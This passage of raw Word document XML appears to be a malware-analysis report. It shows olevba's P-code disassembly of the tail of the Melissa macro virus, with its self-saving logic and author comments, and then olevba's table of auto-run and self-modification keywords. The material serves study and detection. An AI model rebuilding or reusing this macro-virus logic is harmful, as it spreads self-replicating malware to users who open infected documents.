        <w:t xml:space="preserve">Ld NTCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6BE38D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505931B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E94873" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ADCL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D5538" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B1F55" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBDDF7D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72338F8E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F172FED" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77965BF4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E529D12" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Document"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22609814" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">FnInStr3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6F740" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C385718" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187235DF" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089731E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64122E32" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">IfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28832E60" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #75:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96D62A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A2F96C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd FullName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47A137" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ParamNamed FileName </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760093EB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F378F84" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall SaveAs 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61897938" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #76:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FC3102" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">LitDI2 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F1077E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B97106" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemLd New </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31BD96" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0008 "Document"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B42E521" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">FnInStr3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D0154" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B089AED" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ne </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C64C4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Paren </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662297E8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ElseIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582A7DEA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #77:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712D63A7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitVarSpecial (True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75550237" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld ActiveDocument </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942DE42" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">MemSt Saved </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75556191" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoS 0x0000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678CDE7A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIfBlock </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223FD041" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #78:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0525109A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x001F "WORD/Melissa written by Kwyjibo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FAA641" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #79:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC9024D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x0023 "Works in both Word 2000 and Word 97"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A1305" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696898DB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x003E "Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCF514" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #81:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812F335" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>QuoteRem 0x0000 0x003A "Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09044E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #82:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F70C30" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Now </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B5DFD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd Day 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971707F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Now </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF5C42E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsLd Minute 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6273DEEB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Eq </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BBEC8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1912B73B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">BoSImplicit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0C0B3A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>LitStr 0x0076 " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F17A423" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Ld Selection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39009421" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">ArgsMemCall TypeText 0x0001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F7F6A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndIf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D080603" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #83:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB6846" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">EndSub </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C0E56" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>' Line #84:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEC8F7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>+----------+--------------------+---------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A708FC2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Type      |Keyword             |Description                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47F220" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>+----------+--------------------+---------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022077A4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|AutoExec  |Document_Close      |Runs when the Word document is closed        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A8307" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA18314" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |opened                                       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2E7774" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|CreateObject        |May create an OLE object                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A940E2" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|VBProject           |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AEA3B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168A1E4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|VBComponents        |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1617741C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE0634" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|CodeModule          |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0BCED" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECA73E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|AddFromString       |May attempt to modify the VBA code (self-    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D8B285" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |modification)                                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7145463F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|System              |May run an executable file or a system       |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A4C5FE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |command on a Mac (if combined with           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C696F" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |libc.dylib)                                  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7577BA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247F0173" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |used to obfuscate strings (option --decode to|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37675B51" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |see all)                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1326F14B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|Suspicious|VBA Stomping        |VBA Stomping was detected: the VBA source    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58038CEE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |code and P-code are different, this may have |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4279A1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>|          |                    |been used to hide malicious code             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040CFEE" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>+----------+--------------------+---------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175D160" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VBA Stomping detection is experimental: please report any false positive/negative at https://github.com/decalage2/oletools/issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DACF0" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00A03F9E"/>
    <w:sectPr w:rsidR="00CA1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677D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C73A7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D8"/>
    <w:rsid w:val="000B43A5"/>
    <w:rsid w:val="000E089B"/>
    <w:rsid w:val="00127450"/>
    <w:rsid w:val="001D1FD6"/>
    <w:rsid w:val="0033355C"/>
    <w:rsid w:val="005B5620"/>
    <w:rsid w:val="006A0029"/>
    <w:rsid w:val="00775ABA"/>
    <w:rsid w:val="008F4250"/>
    <w:rsid w:val="009816D8"/>
    <w:rsid w:val="00A03F9E"/>
    <w:rsid w:val="00AD4DA8"/>
    <w:rsid w:val="00B31825"/>
    <w:rsid w:val="00B35474"/>
    <w:rsid w:val="00CA1B47"/>
    <w:rsid w:val="00E128F3"/>
    <w:rsid w:val="00F00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04D8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6A6E0AEC-F440-4694-8D2C-4585E6DB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0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24</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Chowdhury</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Anurag Chowdhury</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-18T06:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-18T08:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>